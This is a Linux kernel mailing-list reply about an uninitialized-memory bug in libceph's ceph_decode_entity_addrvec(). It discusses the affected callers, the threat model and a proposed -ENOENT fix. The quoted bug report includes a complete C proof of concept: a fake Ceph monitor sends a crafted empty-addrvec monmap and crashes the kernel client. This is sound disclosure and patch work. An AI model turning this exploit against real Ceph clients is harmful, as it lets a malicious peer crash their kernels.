Re: [PATCH v3] libceph: tolerate addrvecs with multiple entries of the same type

From: Kefu Chai

Date: Mon Jun 22 2026 - 10:16:47 EST


XIAO WU <xiaowu.417@xxxxxx> writes:

> Hi Kefu,
>
> I came across a Sashiko AI code review [1] that flagged a pre-existing
> uninitialized memory issue in `ceph_decode_entity_addrvec()`.  When the
> addrvec has zero entries (`addr_cnt == 0`), the function returns 0
> without writing to `*addr`, but callers like `ceph_monmap_decode()`
> pass addresses from `kmalloc_flex()` and proceed to use them.
>

hi Xiao,

Thanks for the report and the reproducer. I can confirm it. But I'd
prefer sending the fix separately rather than fold it into v3, as you
pointed out it's pre-existing and independent of my patch.

I took a look at the callers of `ceph_decode_entity_addrvec()`.
Following caller suffers from this issue:

- ceph_monmap_decode() mon_inst[] from kmalloc_flex() (heap)
- ceph_mdsmap_decode() on-stack addr -> m_info[mds].addr
- decode_new_up_state_weight() on-stack addr -> osd_addr[osd]
- ProtocolV2 server_ident on-stack addr, used in memcmp()

osdmap_decode() is the one caller where an empty addrvec is *legitimate*,
and the slot is pre-zeroed with osdmap_set_max_osd(), so it's safe.

> I was able to reproduce this in QEMU by running a fake Ceph monitor that
> sends a monmap with an empty addrvec.  With `panic_on_warn=1`, the
> kernel hits a WARNING in `ceph_con_v1_try_read()` and panics.
>

For the commit message / changelog, I'd state the threat model: this
needs a malformed or buggy peer, since legitimate daemons always
advertise at least one addresss -- I checked the current ceph.git to
verify this. But I agree that the connect-to-bogus-addr and panic you
hit does have a concrete impact, as kernel should not panic on malformed
input. this could happen over an unencrypted, signature-unchecked msgr
v1 transport.

For the fix, i'd avoid a defenseive memset() of *addr. as this reminds
me a strncpy which always reset the dest str even if the source str's
length is zero. So I think the right fix is probably to extend the
semantic of `-ENOENT` returned by ceph_decode_entity_addrvec().
Currently, this func returns `-ENOENT` to indicate that "the addrvec has
entries, but none of them is of the wanted type". We can extend to
apply to the emtpy addrvec, so it imply that "no addr of the requested
type". This way, we only need to update osdmap_decode() so it tolerates
-ENOENT.

Ilya, does this direction look right?

>
> On Thu, Jun 11, 2026 at 07:32:51PM +0800, Kefu Chai wrote:
> > ceph_decode_entity_addrvec() currently rejects any addrvec containing
> > more than one entry that matches the requested msgr type...
>
> Your patch correctly tolerates duplicate entries, but the function still
> returns success without touching `*addr` when `addr_cnt == 0`:
>
> ```c
> // net/ceph/decode.c: ceph_decode_entity_addrvec()
> if (!addr_cnt)
>     return 0;  // *addr is still uninitialized
> if (addr_cnt == 1 && !memchr_inv(&tmp_addr, 0, sizeof(tmp_addr)))
>     return 0;  // same
> ```
>
> Callers that pass addresses from dynamic allocation hit stale data:
>
> ```c
> // net/ceph/mon_client.c: ceph_monmap_decode()
> mon_inst = kmalloc_flex(..., num_mon, sizeof(*mon_inst));
> // ...
> ceph_decode_entity_addrvec(p, end, msgr2, &mon_inst[i].addr);
> // mon_inst[i].addr may be uninitialized if addrvec was empty
> ```
>
> [Reproduction]
>
> I set up a fake Ceph v1 monitor on localhost that sends a monmap
> containing a monitor entry with an empty addrvec (addr_cnt=0). Mounting
> the Ceph filesystem against it triggers the monmap decode path, causing
> the client to attempt a connection with the uninitialized address.
>
> [Crash — kernel 7.1.0-rc6, panic_on_warn=1]
>
>   con->v1.connect_seq != le32_to_cpu(con->v1.in_reply.connect_seq)
>   WARNING: net/ceph/messenger_v1.c:901 at
> ceph_con_v1_try_read+0x59f7/0x7020
>
>   RIP: 0010:ceph_con_v1_try_read+0x59f7/0x7020
>   Call Trace:
>    <TASK>
>    ceph_con_workfn+0xa04/0x13c0
>    process_one_work+0xa20/0x1c50
>    worker_thread+0x6df/0xf30
>    kthread+0x387/0x4a0
>    ret_from_fork+0xb2c/0xdd0
>    </TASK>
>
>   Kernel panic - not syncing: kernel: panic_on_warn set ...
>
> Full PoC source (poc.c):
> ---8<----------------------------------------------------------------
> /*
>  * PoC: Uninitialized memory in ceph_decode_entity_addrvec()
>  * Compile: gcc -static -o poc poc.c
>  * Run: ./poc [port]
>  */
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/socket.h>
> #include <sys/mount.h>
> #include <sys/wait.h>
> #include <sys/stat.h>
> #include <sys/poll.h>
> #include <arpa/inet.h>
> #include <netinet/in.h>
> #include <stdint.h>
> #include <errno.h>
> #include <fcntl.h>
>
> #define BANNER "ceph v027"
> #define BNR 9
> #define ADR 136
> #define CBNR (BNR+ADR)
> #define SBNR (BNR+2*ADR)
>
> #define TAG_RDY 1
> #define TAG_MSG 7
> #define MON_MAP 4
> #define ENT_MON 1
>
> #define MSZ 16384
>
> typedef uint8_t u8; typedef uint16_t u16;
> typedef uint32_t u32; typedef uint64_t u64;
>
> static u32 ct[256];
> static int ci;
>
> static void ic(void)
> {
>     u32 i, j, k;
>     if (ci) return;
>     for (i = 0; i < 256; i++) {
>         k = i;
>         for (j = 0; j < 8; j++)
>             k = (k >> 1) ^ (k & 1 ? 0x82F63B78 : 0);
>         ct[i] = k;
>     }
>     ci = 1;
> }
>
> static u32 crc(u32 c, const u8 *b, int l)
> {
>     while (l--) c = ct[(c ^ *b++) & 0xFF] ^ (c >> 8);
>     return c;
> }
>
> #define W8(b,v)  ((b)[0] = (u8)(v))
> #define W16(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255)
> #define W32(b,v)
> ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255,(b)[2]=((v)>>16)&255,(b)[3]=((v)>>24)&255)
> #define W64(b,v) do { int _i; for (_i=0; _i<8; _i++)
> (b)[_i]=((u64)(v)>>(_i*8))&255; } while(0)
>
> #define REQ_FEAT (1ULL << 23)
>
> static int rcv(int f, u8 *b, int l)
> {
>     while (l > 0) {
>         struct pollfd p = { .fd = f, .events = POLLIN };
>         if (poll(&p, 1, 15000) <= 0) return -1;
>         int n = read(f, b, l);
>         if (n <= 0) return -1;
>         b += n; l -= n;
>     }
>     return 0;
> }
>
> static int snd(int f, u8 *b, int l)
> {
>     while (l > 0) { int n = write(f, b, l); if (n <= 0) return -1; b +=
> n; l -= n; }
>     return 0;
> }
>
> static int ea(u8 *b) { W8(b, 2); W32(b+1, 0); return 5; }
>
> static int pay(u8 *b)
> {
>     int o = 0, bo, so, po, mo, ms;
>     bo = o; W32(b+o, 0); o += 4;
>     W8(b+o, 6); o++; W8(b+o, 1); o++;
>     so = o; W32(b+o, 0); o += 4;
>     po = o;
>     W64(b+o, 0x42); o += 8;
>     W32(b+o, 1); o += 4;
>     W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
>     W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
>     W32(b+o, 1); o += 4;
>     W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
>     W8(b+o, 1); o++; W8(b+o, 1); o++;
>     mo = o; W32(b+o, 0); o += 4;
>     ms = o;
>     W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
>     o += ea(b+o);
>     W32(b+mo, o - ms);
>     W32(b+so, o - po);
>     W32(b+bo, o - bo);
>     return o;
> }
>
> #define HS 60
> #define FS 13
>
> static int msg(u8 *b, u64 s)
> {
>     int o = 0;
>     b[o++] = TAG_MSG;
>     int h = o;
>     memset(b+o, 0, HS); o += HS;
>     int pl = pay(b+o); o += pl;
>     memset(b+o, 0, FS); o += FS;
>     u8 *hh = b + h;
>     W64(hh+0, s); W16(hh+16, MON_MAP); W16(hh+18, 127);
>     W16(hh+20, 1); W32(hh+22, pl); W64(hh+36, ENT_MON);
>     W64(hh+44, 0); W32(hh+56, crc(0, hh, 56));
>     return o;
> }
>
> static int mon(int pt)
> {
>     int s, c; struct sockaddr_in a; u8 b[MSZ];
>     ic();
>     s = socket(AF_INET, SOCK_STREAM, 0);
>     int o = 1; setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o));
>     memset(&a, 0, sizeof(a)); a.sin_family = AF_INET;
>     a.sin_addr.s_addr = htonl(INADDR_LOOPBACK); a.sin_port = htons(pt);
>     bind(s, (void *)&a, sizeof(a)); listen(s, 1);
>     struct pollfd p = { .fd = s, .events = POLLIN };
>     if (poll(&p, 1, 60000) <= 0) goto out;
>     c = accept(s, 0, 0);
>
>     if (rcv(c, b, CBNR) < 0) goto done;
>     { u8 *p = b; memcpy(p, BANNER, BNR); p += BNR;
>       memset(p, 0, ADR); p += ADR; memset(p, 0, ADR);
>       if (snd(c, b, SBNR) < 0) goto done; }
>     { int t = 0; while (t < 26) {
>         struct pollfd p2 = { .fd = c, .events = POLLIN };
>         if (poll(&p2, 1, 10000) <= 0) goto done;
>         int n = read(c, b+t, MSZ-t); if (n <= 0) goto done; t += n; } }
>     memset(b, 0, 26); W8(b, TAG_RDY); W64(b+1, REQ_FEAT);
>     snd(c, b, 26); usleep(300000);
>     { int ml = msg(b, 1); snd(c, b, ml); }
>     usleep(500000);
>     { int ml = msg(b, 2); snd(c, b, ml); }
> out:
>     close(c); close(s); return 0;
> done:
>     close(c); close(s); return -1;
> }
>
> int main(int ac, char **av)
> {
>     int pt = 16789; if (ac >= 2) pt = atoi(av[1]);
>     pid_t pid = fork();
>     if (pid == 0) { mon(pt); _exit(0); }
>     usleep(200000);
>     mkdir("/tmp/mnt", 0700);
>     char s[64]; snprintf(s, 64, "127.0.0.1:%d:/", pt);
>     mount(s, "/tmp/mnt", "ceph", 0, "name=admin");
>     waitpid(pid, 0, 0);
>     umount2("/tmp/mnt", MNT_FORCE); rmdir("/tmp/mnt");
>     return 0;
> }
> ---8<----------------------------------------------------------------
> Compile: gcc -static -o poc poc.c
>
> [1]
> https://sashiko.dev/#/patchset/20260611113251.2975975-1-k.chai%40proxmox.com
>     (Sashiko AI code review — "Uninitialized Memory", Severity: High)
>
> Thanks,
> XIAOWU